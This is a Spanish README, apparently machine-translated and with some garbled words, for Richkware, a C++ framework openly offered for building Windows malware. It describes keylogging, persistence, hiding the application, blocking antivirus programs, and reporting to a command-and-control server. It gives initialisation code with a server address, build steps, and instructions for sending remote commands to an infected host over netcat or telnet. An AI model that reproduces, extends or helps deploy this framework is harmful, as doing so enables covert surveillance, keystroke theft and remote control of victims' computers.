Richkware

Marco para construir malware de Windows, escrito en C ++.

Richkware es una biblioteca de funciones de red y sistema operativo que puede usar para crear malware. La composición de estas funciones permite que la aplicación asuma comportamientos referibles a los siguientes tipos de malware:

• Virus
• Gusanos
• Bot
• Spyware
• Keylogger
• Chirrido

Richkware-Manager-Server: Servicio para la administración de hosts en el que está presente una instancia de malware desarrollada con RichKware Framework.

Richkware-Manager-Client: Cliente de RichKware-Manager-Server , que obtiene la lista de todos los hosts del servidor y puede enviarles cualquier tipo de comandos.

• Server ( Network.h ): Módulo para la administración de un servidor de múltiples subprocesos, que permiten recibir comandos de Internet (RichKware-Manager-Client o consola) de acuerdo con el protocolo específico.
  • Protocolo ( Protocolo.h ):
    1. Ejecución de comando remotamente (ID 1)
    2. (trabajo en progreso)
• Red ( Network.H ):
  • RawRequest : envíe una solicitud a un servidor;
  • UploadInfotorichkwaremanagerServer : envíe información a richkware-manager-server

• Storage ( Storage.h ):

  • SaveSession y LoadSession : Guardar el estado de la aplicación (encriptado) a:
    • Regístrese (SaveValueReg y LoadValueReg)
    • Archivo (SaveValuetOfile y LoadValueFromFile)
  • Persistencia : Instale permanentemente en el sistema.

• Isadmin y requestAdMinPrivileges ( richkware.h ): verifique y requiere privilegios de administrador;

• StealthWindow ( richkware.h ): ocultar aplicaciones;

• OpenApp ( Richkware.h ): Open Aplicaciones arbitrarias;

• Keylogger ( richkware.h ): almacena en un archivo todas las teclas presionadas;

• BlockApps E UnblockApps ( blockapps.h ): aplicaciones de bloques y desbloqueos (antivirus, ...).

• Encrypt y decrypt ( crypto.h ): rc4 (predeterminado), blowfish.
• Codificar y decodificar ( crypto.h ): base64 (defualt), hex.

• RandMouse ( Richkware.h ): mueva al azar el cursor del mouse;
• Hibernación ( Richkware.h ): sistema de hibernación.

Estos son los requisitos base para construir y usar RichKware:

• Hacer o cmake
• Mingw

Abra main.cpp y cree una instancia de richkware.

Si ha implementado RMS, puede inicializar el malware de la siguiente manera:

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

que obtiene una clave segura de RichKware-Manager-Server y establece la clave como clave de cifrado. Defaultpass se usa como clave de cifrado temporal para garantizar una comunicación segura con RMS y si el malware no puede alcanzar el RMS para obtener su cifrado KET, utilizará la clave de cifrado predeterminada como la clave de cifrado.

De lo contrario, si no ha implementado RMS, puede usar:

 Richkware richkware("Richk","richktest");

De esta manera, utiliza "Richktest" como clave de cifrado.

Después de la implementación de Main.CPP , puede compilar de la siguiente manera.

 make

• C/C ++> Preprocesador> Definiciones del preprocesador, agregue "_crt_secure_no_warnings"
• Linker> Entrada> Dependencias adicionales, agregue "WS2_32.Lib"

En el siguiente ejemplo, llamamos " servidor ", un malware desarrollado usando RichKware Framework y en el que se ha habilitado la función para crear un servidor, y " Cliente ", el Creador (Hacker) del malware que está tratando de establecer una conexión con la PC infectada.

Call Framework Función Inicio de Starterver En general, inicia el servidor en un puerto, en el siguiente ejemplo es el puerto TCP 8000. Recuerde que si otro programa ya usa un puerto, no puede usar ese puerto, hasta que el programa se detenga.

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

En todos los sistemas donde se instala la máquina virtual Java, puede usar RichKware-Manager-Client, de lo contrario, si no está presente, puede usar fácilmente un terminal.

En los sistemas UNIX, puede usar NetCat y ejecutar el siguiente comando:

 nc <serverName> 8000

Si el servidor recibió la solicitud en el puerto abierto y tiene éxito para crear una conexión, responde al cliente que confirma el establecimiento de la conexión, después de eso, puede escribir:

 [[1]]COMMAND

donde el comando es un comando que debe ejecutarse en el host infectado donde se ejecuta el servidor.

En Windows, puede usar Telnet , de la misma manera:

 telnet <serverName> 8000

...

 [[1]]COMMAND